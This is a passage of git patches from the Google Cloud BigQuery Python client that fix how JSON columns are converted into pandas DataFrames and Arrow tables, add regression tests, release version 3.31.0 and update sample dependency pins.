[PATCH 077/202] fix: avoid "Unable to determine type" warning with JSON columns in `to_dataframe` (#1876) * add regression tests for empty dataframe * fix arrow test to be compatible with old pyarrow --- google/cloud/bigquery/_helpers.py | 15 ++++ google/cloud/bigquery/_pandas_helpers.py | 1 + google/cloud/bigquery/_pyarrow_helpers.py | 26 ++++++- google/cloud/bigquery/table.py | 4 +- tests/system/test_arrow.py | 29 ++++++++ tests/system/test_pandas.py | 26 +++++++ .../test_data_frame_cell_data_parser.py | 71 +++++++++++++++++++ tests/unit/test__pyarrow_helpers.py | 12 +++- tests/unit/test_table_arrow.py | 66 +++++++++++------ tests/unit/test_table_pandas.py | 4 ++ 10 files changed, 230 insertions(+), 24 deletions(-) create mode 100644 tests/unit/_helpers/test_data_frame_cell_data_parser.py diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index 4ba3ccf93..76c4f1fbd 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -387,6 +387,21 @@ def range_to_py(self, value, field): CELL_DATA_PARSER = CellDataParser() +class DataFrameCellDataParser(CellDataParser): + """Override of CellDataParser to handle differences in expectation of values in DataFrame-like outputs. + + This is used to turn the output of the REST API into a pyarrow Table, + emulating the serialized arrow from the BigQuery Storage Read API. + """ + + def json_to_py(self, value, _): + """No-op because DataFrame expects string for JSON output.""" + return value + + +DATA_FRAME_CELL_DATA_PARSER = DataFrameCellDataParser() + + class ScalarQueryParamParser(CellDataParser): """Override of CellDataParser to handle the differences in the response from query params. 
diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index feb6b3adb..457eb9078 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -158,6 +158,7 @@ def finish(self): b"ARROW:extension:metadata": b'{"encoding": "WKT"}', }, "DATETIME": {b"ARROW:extension:name": b"google:sqlType:datetime"}, + "JSON": {b"ARROW:extension:name": b"google:sqlType:json"}, } diff --git a/google/cloud/bigquery/_pyarrow_helpers.py b/google/cloud/bigquery/_pyarrow_helpers.py index 034e020ee..03c70bf63 100644 --- a/google/cloud/bigquery/_pyarrow_helpers.py +++ b/google/cloud/bigquery/_pyarrow_helpers.py @@ -15,7 +15,9 @@ """Shared helper functions for connecting BigQuery and pyarrow. NOTE: This module is DEPRECATED. Please make updates in the pandas-gbq package, -instead. See: go/pandas-gbq-and-bigframes-redundancy and +instead. See: go/pandas-gbq-and-bigframes-redundancy, +https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/bigquery_to_pyarrow.py +and https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/pyarrow_to_bigquery.py """ @@ -26,6 +28,14 @@ except ImportError: pyarrow = None +try: + import db_dtypes # type: ignore + + db_dtypes_import_exception = None +except ImportError as exc: + db_dtypes = None + db_dtypes_import_exception = exc + def pyarrow_datetime(): return pyarrow.timestamp("us", tz=None) @@ -67,12 +77,18 @@ def pyarrow_timestamp(): "GEOGRAPHY": pyarrow.string, "INT64": pyarrow.int64, "INTEGER": pyarrow.int64, + # Normally, we'd prefer JSON type built-in to pyarrow (added in 19.0.0), + # but we'd like this to map as closely to the BQ Storage API as + # possible, which uses the string() dtype, as JSON support in Arrow + # predates JSON support in BigQuery by several years. 
+ "JSON": pyarrow.string, "NUMERIC": pyarrow_numeric, "STRING": pyarrow.string, "TIME": pyarrow_time, "TIMESTAMP": pyarrow_timestamp, } + # DEPRECATED: update pandas_gbq.schema.pyarrow_to_bigquery, instead. _ARROW_SCALAR_IDS_TO_BQ = { # https://arrow.apache.org/docs/python/api/datatypes.html#type-classes pyarrow.bool_().id: "BOOL", @@ -97,6 +113,9 @@ def pyarrow_timestamp(): pyarrow.large_string().id: "STRING", # The exact scale and precision don't matter, see below. pyarrow.decimal128(38, scale=9).id: "NUMERIC", + # NOTE: all extension types (e.g. json_, uuid, db_dtypes.JSONArrowType) + # have the same id (31 as of version 19.0.1), so these should not be + # matched by id. } _BQ_TO_ARROW_SCALARS["BIGNUMERIC"] = pyarrow_bignumeric @@ -107,6 +126,9 @@ def pyarrow_timestamp(): def bq_to_arrow_scalars(bq_scalar: str): """ + DEPRECATED: update pandas_gbq.schema.bigquery_to_pyarrow, instead, which is + to be added in https://github.com/googleapis/python-bigquery-pandas/pull/893. + Returns: The Arrow scalar type that the input BigQuery scalar type maps to. If it cannot find the BigQuery scalar, return None. @@ -116,6 +138,8 @@ def bq_to_arrow_scalars(bq_scalar: str): def arrow_scalar_ids_to_bq(arrow_scalar: Any): """ + DEPRECATED: update pandas_gbq.schema.pyarrow_to_bigquery, instead. + Returns: The BigQuery scalar type that the input arrow scalar type maps to. If it cannot find the arrow scalar, return None. 
diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index f139e44ad..238ff6beb 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -3533,7 +3533,9 @@ def _row_iterator_page_columns(schema, response): def get_column_data(field_index, field): for row in rows: - yield _helpers.CELL_DATA_PARSER.to_py(row["f"][field_index]["v"], field) + yield _helpers.DATA_FRAME_CELL_DATA_PARSER.to_py( + row["f"][field_index]["v"], field + ) for field_index, field in enumerate(schema): columns.append(get_column_data(field_index, field)) diff --git a/tests/system/test_arrow.py b/tests/system/test_arrow.py index 82cf11f85..f2aed656c 100644 --- a/tests/system/test_arrow.py +++ b/tests/system/test_arrow.py @@ -194,3 +194,32 @@ def test_list_rows_range_csv( range_type = schema.field("range_date").type assert range_type == expected_type + + +def test_to_arrow_query_with_empty_results(bigquery_client): + """ + JSON regression test for https://github.com/googleapis/python-bigquery/issues/1580. 
+ """ + job = bigquery_client.query( + """ + select + 123 as int_col, + '' as string_col, + to_json('{}') as json_col, + struct(to_json('[]') as json_field, -1 as int_field) as struct_col, + [to_json('null')] as json_array_col, + from unnest([]) + """ + ) + table = job.to_arrow() + assert list(table.column_names) == [ + "int_col", + "string_col", + "json_col", + "struct_col", + "json_array_col", + ] + assert table.shape == (0, 5) + struct_type = table.field("struct_col").type + assert struct_type.get_field_index("json_field") == 0 + assert struct_type.get_field_index("int_field") == 1 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index e65fca27e..01f552435 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1304,6 +1304,32 @@ def test_upload_time_and_datetime_56(bigquery_client, dataset_id): ] +def test_to_dataframe_query_with_empty_results(bigquery_client): + """ + JSON regression test for https://github.com/googleapis/python-bigquery/issues/1580. 
+ """ + job = bigquery_client.query( + """ + select + 123 as int_col, + '' as string_col, + to_json('{}') as json_col, + struct(to_json('[]') as json_field, -1 as int_field) as struct_col, + [to_json('null')] as json_array_col, + from unnest([]) + """ + ) + df = job.to_dataframe() + assert list(df.columns) == [ + "int_col", + "string_col", + "json_col", + "struct_col", + "json_array_col", + ] + assert len(df.index) == 0 + + def test_to_dataframe_geography_as_objects(bigquery_client, dataset_id): wkt = pytest.importorskip("shapely.wkt") bigquery_client.query( diff --git a/tests/unit/_helpers/test_data_frame_cell_data_parser.py b/tests/unit/_helpers/test_data_frame_cell_data_parser.py new file mode 100644 index 000000000..c3332dc89 --- /dev/null +++ b/tests/unit/_helpers/test_data_frame_cell_data_parser.py @@ -0,0 +1,71 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import pytest + +import google.cloud.bigquery.schema + + +def create_field(mode="NULLABLE", type_="IGNORED", name="test_field", **kwargs): + return google.cloud.bigquery.schema.SchemaField(name, type_, mode=mode, **kwargs) + + +@pytest.fixture +def mut(): + from google.cloud.bigquery import _helpers + + return _helpers + + +@pytest.fixture +def object_under_test(mut): + return mut.DATA_FRAME_CELL_DATA_PARSER + + +def test_json_to_py_doesnt_parse_json(object_under_test): + coerced = object_under_test.json_to_py('{"key":"value"}', create_field()) + assert coerced == '{"key":"value"}' + + +def test_json_to_py_repeated_doesnt_parse_json(object_under_test): + coerced = object_under_test.json_to_py('{"key":"value"}', create_field("REPEATED")) + assert coerced == '{"key":"value"}' + + +def test_record_to_py_doesnt_parse_json(object_under_test): + subfield = create_field(type_="JSON", name="json") + field = create_field(fields=[subfield]) + value = {"f": [{"v": '{"key":"value"}'}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"json": '{"key":"value"}'} + + +def test_record_to_py_doesnt_parse_repeated_json(object_under_test): + subfield = create_field("REPEATED", "JSON", name="json") + field = create_field("REQUIRED", fields=[subfield]) + value = { + "f": [ + { + "v": [ + {"v": '{"key":"value0"}'}, + {"v": '{"key":"value1"}'}, + {"v": '{"key":"value2"}'}, + ] + } + ] + } + coerced = object_under_test.record_to_py(value, field) + assert coerced == { + "json": ['{"key":"value0"}', '{"key":"value1"}', '{"key":"value2"}'] + } diff --git a/tests/unit/test__pyarrow_helpers.py b/tests/unit/test__pyarrow_helpers.py index f0a872c88..06fc2eb85 100644 --- a/tests/unit/test__pyarrow_helpers.py +++ b/tests/unit/test__pyarrow_helpers.py @@ -27,8 +27,16 @@ def module_under_test(): def test_bq_to_arrow_scalars(module_under_test): assert ( - module_under_test.bq_to_arrow_scalars("BIGNUMERIC") - == module_under_test.pyarrow_bignumeric + 
module_under_test.bq_to_arrow_scalars("BIGNUMERIC")() + == module_under_test.pyarrow_bignumeric() + ) + assert ( + # Normally, we'd prefer JSON type built-in to pyarrow (added in 19.0.0), + # but we'd like this to map as closely to the BQ Storage API as + # possible, which uses the string() dtype, as JSON support in Arrow + # predates JSON support in BigQuery by several years. + module_under_test.bq_to_arrow_scalars("JSON")() + == pyarrow.string() ) assert module_under_test.bq_to_arrow_scalars("UNKNOWN_TYPE") is None diff --git a/tests/unit/test_table_arrow.py b/tests/unit/test_table_arrow.py index 6f1e6f76a..830c4ceb7 100644 --- a/tests/unit/test_table_arrow.py +++ b/tests/unit/test_table_arrow.py @@ -28,6 +28,7 @@ def test_to_arrow_with_jobs_query_response(): "fields": [ {"name": "name", "type": "STRING", "mode": "NULLABLE"}, {"name": "number", "type": "INTEGER", "mode": "NULLABLE"}, + {"name": "json", "type": "JSON", "mode": "NULLABLE"}, ] }, "jobReference": { @@ -37,15 +38,21 @@ def test_to_arrow_with_jobs_query_response(): }, "totalRows": "9", "rows": [ - {"f": [{"v": "Tiarra"}, {"v": "6"}]}, - {"f": [{"v": "Timothy"}, {"v": "325"}]}, - {"f": [{"v": "Tina"}, {"v": "26"}]}, - {"f": [{"v": "Tierra"}, {"v": "10"}]}, - {"f": [{"v": "Tia"}, {"v": "17"}]}, - {"f": [{"v": "Tiara"}, {"v": "22"}]}, - {"f": [{"v": "Tiana"}, {"v": "6"}]}, - {"f": [{"v": "Tiffany"}, {"v": "229"}]}, - {"f": [{"v": "Tiffani"}, {"v": "8"}]}, + {"f": [{"v": "Tiarra"}, {"v": "6"}, {"v": "123"}]}, + {"f": [{"v": "Timothy"}, {"v": "325"}, {"v": '{"key":"value"}'}]}, + {"f": [{"v": "Tina"}, {"v": "26"}, {"v": "[1,2,3]"}]}, + { + "f": [ + {"v": "Tierra"}, + {"v": "10"}, + {"v": '{"aKey": {"bKey": {"cKey": -123}}}'}, + ] + }, + {"f": [{"v": "Tia"}, {"v": "17"}, {"v": None}]}, + {"f": [{"v": "Tiara"}, {"v": "22"}, {"v": '"some-json-string"'}]}, + {"f": [{"v": "Tiana"}, {"v": "6"}, {"v": '{"nullKey":null}'}]}, + {"f": [{"v": "Tiffany"}, {"v": "229"}, {"v": '""'}]}, + {"f": [{"v": "Tiffani"}, {"v": 
"8"}, {"v": "[]"}]}, ], "totalBytesProcessed": "154775150", "jobComplete": True, @@ -65,7 +72,7 @@ def test_to_arrow_with_jobs_query_response(): ) records = rows.to_arrow() - assert records.column_names == ["name", "number"] + assert records.column_names == ["name", "number", "json"] assert records["name"].to_pylist() == [ "Tiarra", "Timothy", @@ -78,6 +85,17 @@ def test_to_arrow_with_jobs_query_response(): "Tiffani", ] assert records["number"].to_pylist() == [6, 325, 26, 10, 17, 22, 6, 229, 8] + assert records["json"].to_pylist() == [ + "123", + '{"key":"value"}', + "[1,2,3]", + '{"aKey": {"bKey": {"cKey": -123}}}', + None, + '"some-json-string"', + '{"nullKey":null}', + '""', + "[]", + ] def test_to_arrow_with_jobs_query_response_and_max_results(): @@ -87,6 +105,7 @@ def test_to_arrow_with_jobs_query_response_and_max_results(): "fields": [ {"name": "name", "type": "STRING", "mode": "NULLABLE"}, {"name": "number", "type": "INTEGER", "mode": "NULLABLE"}, + {"name": "json", "type": "JSON", "mode": "NULLABLE"}, ] }, "jobReference": { @@ -96,15 +115,21 @@ def test_to_arrow_with_jobs_query_response_and_max_results(): }, "totalRows": "9", "rows": [ - {"f": [{"v": "Tiarra"}, {"v": "6"}]}, - {"f": [{"v": "Timothy"}, {"v": "325"}]}, - {"f": [{"v": "Tina"}, {"v": "26"}]}, - {"f": [{"v": "Tierra"}, {"v": "10"}]}, - {"f": [{"v": "Tia"}, {"v": "17"}]}, - {"f": [{"v": "Tiara"}, {"v": "22"}]}, - {"f": [{"v": "Tiana"}, {"v": "6"}]}, - {"f": [{"v": "Tiffany"}, {"v": "229"}]}, - {"f": [{"v": "Tiffani"}, {"v": "8"}]}, + {"f": [{"v": "Tiarra"}, {"v": "6"}, {"v": "123"}]}, + {"f": [{"v": "Timothy"}, {"v": "325"}, {"v": '{"key":"value"}'}]}, + {"f": [{"v": "Tina"}, {"v": "26"}, {"v": "[1,2,3]"}]}, + { + "f": [ + {"v": "Tierra"}, + {"v": "10"}, + {"v": '{"aKey": {"bKey": {"cKey": -123}}}'}, + ] + }, + {"f": [{"v": "Tia"}, {"v": "17"}, {"v": None}]}, + {"f": [{"v": "Tiara"}, {"v": "22"}, {"v": '"some-json-string"'}]}, + {"f": [{"v": "Tiana"}, {"v": "6"}, {"v": '{"nullKey":null}'}]}, + 
{"f": [{"v": "Tiffany"}, {"v": "229"}, {"v": '""'}]}, + {"f": [{"v": "Tiffani"}, {"v": "8"}, {"v": "[]"}]}, ], "totalBytesProcessed": "154775150", "jobComplete": True, @@ -125,10 +150,11 @@ def test_to_arrow_with_jobs_query_response_and_max_results(): ) records = rows.to_arrow() - assert records.column_names == ["name", "number"] + assert records.column_names == ["name", "number", "json"] assert records["name"].to_pylist() == [ "Tiarra", "Timothy", "Tina", ] assert records["number"].to_pylist() == [6, 325, 26] + assert records["json"].to_pylist() == ["123", '{"key":"value"}', "[1,2,3]"] diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 9e42fb737..94737732b 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -59,6 +59,7 @@ def test_to_dataframe_nullable_scalars( pyarrow.field( "timestamp_col", pyarrow.timestamp("us", tz=datetime.timezone.utc) ), + pyarrow.field("json_col", pyarrow.string()), ] ) arrow_table = pyarrow.Table.from_pydict( @@ -78,6 +79,7 @@ def test_to_dataframe_nullable_scalars( 2021, 8, 9, 13, 30, 44, 123456, tzinfo=datetime.timezone.utc ) ], + "json_col": ["{}"], }, schema=arrow_schema, ) @@ -94,6 +96,7 @@ def test_to_dataframe_nullable_scalars( bigquery.SchemaField("string_col", "STRING"), bigquery.SchemaField("time_col", "TIME"), bigquery.SchemaField("timestamp_col", "TIMESTAMP"), + bigquery.SchemaField("json_col", "JSON"), ] mock_client = mock.create_autospec(bigquery.Client) mock_client.project = "test-proj" @@ -117,6 +120,7 @@ def test_to_dataframe_nullable_scalars( assert df.dtypes["string_col"].name == "object" assert df.dtypes["time_col"].name == "dbtime" assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]" + assert df.dtypes["json_col"].name == "object" # Check for expected values. 
assert df["bignumeric_col"][0] == decimal.Decimal("123.456789101112131415") From 85de1a361d8bbda7ff8a20b34ffd5a0e619a1f38 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 25 Mar 2025 13:45:20 -0500 Subject: [PATCH 078/202] chore(main): release 3.31.0 (#2139) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 21 +++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 22 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 91d0a362d..4b115464c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,27 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.31.0](https://github.com/googleapis/python-bigquery/compare/v3.30.0...v3.31.0) (2025-03-20) + + +### Features + +* Add query text and total bytes processed to RowIterator ([#2140](https://github.com/googleapis/python-bigquery/issues/2140)) ([2d5f932](https://github.com/googleapis/python-bigquery/commit/2d5f9320d7103bc64c7ba496ba54bb0ef52b5605)) +* Add support for Python 3.13 ([0842aa1](https://github.com/googleapis/python-bigquery/commit/0842aa10967b1d8395cfb43e52c8ea091b381870)) + + +### Bug Fixes + +* Adding property setter for table constraints, [#1990](https://github.com/googleapis/python-bigquery/issues/1990) ([#2092](https://github.com/googleapis/python-bigquery/issues/2092)) ([f8572dd](https://github.com/googleapis/python-bigquery/commit/f8572dd86595361bae82c3232b2c0d159690a7b7)) +* Allow protobuf 6.x ([0842aa1](https://github.com/googleapis/python-bigquery/commit/0842aa10967b1d8395cfb43e52c8ea091b381870)) +* Avoid "Unable to determine type" warning with JSON columns in `to_dataframe` ([#1876](https://github.com/googleapis/python-bigquery/issues/1876)) ([968020d](https://github.com/googleapis/python-bigquery/commit/968020d5be9d2a30b90d046eaf52f91bb2c70911)) +* Remove setup.cfg configuration for creating universal wheels 
([#2146](https://github.com/googleapis/python-bigquery/issues/2146)) ([d7f7685](https://github.com/googleapis/python-bigquery/commit/d7f76853d598c354bfd2e65f5dde28dae97da0ec)) + + +### Dependencies + +* Remove Python 3.7 and 3.8 as supported runtimes ([#2133](https://github.com/googleapis/python-bigquery/issues/2133)) ([fb7de39](https://github.com/googleapis/python-bigquery/commit/fb7de398cb2ad000b80a8a702d1f6539dc03d8e0)) + ## [3.30.0](https://github.com/googleapis/python-bigquery/compare/v3.29.0...v3.30.0) (2025-02-26) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 01c4c51ca..c0f7a96d6 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.30.0" +__version__ = "3.31.0" From 4e618e560bfea1ca3b7f17b4fc1f8f438fa6c77e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 27 Mar 2025 19:00:31 +0100 Subject: [PATCH 079/202] chore(deps): update all dependencies (#2143) * chore(deps): update all dependencies * pin ipython===8.18.1 for python 3.9 --------- Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 6 ++--- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements-test.txt | 4 +-- samples/geography/requirements.txt | 34 ++++++++++++------------ samples/magics/requirements-test.txt | 6 ++--- samples/magics/requirements.txt | 8 +++--- samples/notebooks/requirements-test.txt | 6 ++--- samples/notebooks/requirements.txt | 13 ++++----- samples/snippets/requirements-test.txt | 6 ++--- samples/snippets/requirements.txt | 2 +- 10 files changed, 44 insertions(+), 43 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index cf215e2fd..c8290d33f 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,3 +1,3 @@ 
-google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 165800741..fa349e0d3 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.27.0 +google-cloud-bigquery==3.31.0 google-auth-oauthlib==1.2.1 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 4ad1bd028..5d20a4554 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,2 +1,2 @@ -pytest==8.3.4 -mock==5.1.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 0ad2154a4..3fa11ce7c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,41 +1,41 @@ -attrs==24.3.0 -certifi==2024.12.14 +attrs==25.3.0 +certifi==2025.1.31 cffi==1.17.1 charset-normalizer==3.4.1 click==8.1.8 click-plugins==1.1.1 cligj==0.7.2 -db-dtypes==1.3.1 +db-dtypes==1.4.2 Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 -google-api-core==2.24.0 -google-auth==2.37.0 -google-cloud-bigquery==3.27.0 -google-cloud-bigquery-storage==2.27.0 -google-cloud-core==2.4.1 -google-crc32c==1.6.0 +google-api-core==2.24.2 +google-auth==2.38.0 +google-cloud-bigquery==3.31.0 +google-cloud-bigquery-storage==2.30.0 +google-cloud-core==2.4.3 +google-crc32c==1.7.1 google-resumable-media==2.7.2 -googleapis-common-protos==1.66.0 -grpcio==1.69.0 +googleapis-common-protos==1.69.2 +grpcio==1.71.0 idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 packaging==24.2 pandas==2.2.3 -proto-plus==1.25.0 -pyarrow==18.1.0 +proto-plus==1.26.1 +pyarrow==19.0.1 pyasn1==0.6.1 pyasn1-modules==0.4.1 pycparser==2.22 -pyparsing==3.2.1 +pyparsing==3.2.3 python-dateutil==2.9.0.post0 -pytz==2024.2 +pytz==2025.2 PyYAML==6.0.2 requests==2.32.3 rsa==4.9 -Shapely==2.0.6 
+Shapely==2.0.7 six==1.17.0 -typing-extensions==4.12.2 +typing-extensions==4.13.0 typing-inspect==0.9.0 urllib3==2.3.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index cf215e2fd..c8290d33f 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,3 +1,3 @@ -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 4b81fe0ad..3ab215951 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.5.0 -db-dtypes==1.3.1 -google.cloud.bigquery==3.27.0 -google-cloud-bigquery-storage==2.27.0 +bigquery_magics==0.9.0 +db-dtypes==1.4.2 +google.cloud.bigquery==3.31.0 +google-cloud-bigquery-storage==2.30.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index cf215e2fd..c8290d33f 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,3 +1,3 @@ -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index e92d084a4..ca5505a2e 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,8 +1,9 @@ -bigquery-magics==0.5.0 -db-dtypes==1.3.1 -google-cloud-bigquery==3.27.0 -google-cloud-bigquery-storage==2.27.0 -ipython==8.18.1 +bigquery-magics==0.9.0 +db-dtypes==1.4.2 +google-cloud-bigquery==3.31.0 +google-cloud-bigquery-storage==2.30.0 +ipython===8.18.1; python_version == '3.9' +ipython==9.0.2; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.0; python_version >= '3.10' +matplotlib==3.10.1; python_version >= '3.10' pandas==2.2.3 diff --git 
a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 52ccc8ab2..197b89187 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,4 +1,4 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 307ebac24..4b88c6b70 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.27.0 +google-cloud-bigquery==3.31.0 From c526822ce781d5c24e37703507d74fd785a5fe29 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 1 Apr 2025 00:40:19 +0200 Subject: [PATCH 080/202] chore(deps): update dependency pyasn1-modules to v0.4.2 (#2150) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 3fa11ce7c..514e19d2c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -26,7 +26,7 @@ pandas==2.2.3 proto-plus==1.26.1 pyarrow==19.0.1 pyasn1==0.6.1 -pyasn1-modules==0.4.1 +pyasn1-modules==0.4.2 pycparser==2.22 pyparsing==3.2.3 python-dateutil==2.9.0.post0 From 77d71736fcc006d3ab8f8ba17955ad5f06e21876 Mon Sep 17 00:00:00 2001 From: yokomotod Date: Wed, 2 Apr 2025 05:16:41 +0900 Subject: [PATCH 081/202] fix: empty record dtypes (#2147) * fix: empty record dtypes * update pandas minimum version * fix coverage * fix test_pandas --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 42 +++++++++++++++------------------- pyproject.toml | 2 +- testing/constraints-3.9.txt | 2 +- tests/system/test_pandas.py | 7 +----- tests/unit/test_table.py | 10 ++------ 5 files changed, 23 insertions(+), 40 deletions(-) 
diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 238ff6beb..099f7fd69 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2648,31 +2648,25 @@ def to_dataframe( if pyarrow.types.is_timestamp(col.type) ) - if len(record_batch) > 0: - df = record_batch.to_pandas( + df = record_batch.to_pandas( + date_as_object=date_as_object, + timestamp_as_object=timestamp_as_object, + integer_object_nulls=True, + types_mapper=_pandas_helpers.default_types_mapper( date_as_object=date_as_object, - timestamp_as_object=timestamp_as_object, - integer_object_nulls=True, - types_mapper=_pandas_helpers.default_types_mapper( - date_as_object=date_as_object, - bool_dtype=bool_dtype, - int_dtype=int_dtype, - float_dtype=float_dtype, - string_dtype=string_dtype, - date_dtype=date_dtype, - datetime_dtype=datetime_dtype, - time_dtype=time_dtype, - timestamp_dtype=timestamp_dtype, - range_date_dtype=range_date_dtype, - range_datetime_dtype=range_datetime_dtype, - range_timestamp_dtype=range_timestamp_dtype, - ), - ) - else: - # Avoid "ValueError: need at least one array to concatenate" on - # older versions of pandas when converting empty RecordBatch to - # DataFrame. 
See: https://github.com/pandas-dev/pandas/issues/41241 - df = pandas.DataFrame([], columns=record_batch.schema.names) + bool_dtype=bool_dtype, + int_dtype=int_dtype, + float_dtype=float_dtype, + string_dtype=string_dtype, + date_dtype=date_dtype, + datetime_dtype=datetime_dtype, + time_dtype=time_dtype, + timestamp_dtype=timestamp_dtype, + range_date_dtype=range_date_dtype, + range_datetime_dtype=range_datetime_dtype, + range_timestamp_dtype=range_timestamp_dtype, + ), + ) for column in dtypes: df[column] = pandas.Series(df[column], dtype=dtypes[column], copy=False) diff --git a/pyproject.toml b/pyproject.toml index 17bf4fd20..38d74cdd0 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -72,7 +72,7 @@ bqstorage = [ "pyarrow >= 4.0.0", ] pandas = [ - "pandas >= 1.1.4", + "pandas >= 1.3.0", "pandas-gbq >= 0.26.1", "grpcio >= 1.47.0, < 2.0.0", "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index 63b5d8bf6..cb6c29f3b 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -21,7 +21,7 @@ opentelemetry-api==1.1.0 opentelemetry-instrumentation==0.20b0 opentelemetry-sdk==1.1.0 packaging==24.2.0 -pandas==1.1.4 +pandas==1.3.0 pandas-gbq==0.26.1 proto-plus==1.22.3 protobuf==3.20.2 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index 01f552435..1fe7ff2cd 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1222,12 +1222,7 @@ def test_list_rows_nullable_scalars_extreme_dtypes_w_custom_dtype( # These pandas dtypes are handled by the custom dtypes. assert df.dtypes["bool_col"].name == "boolean" - # Result is dependent upon which version of pandas is being used. - # Float64 was not introduced until pandas version 1.4. 
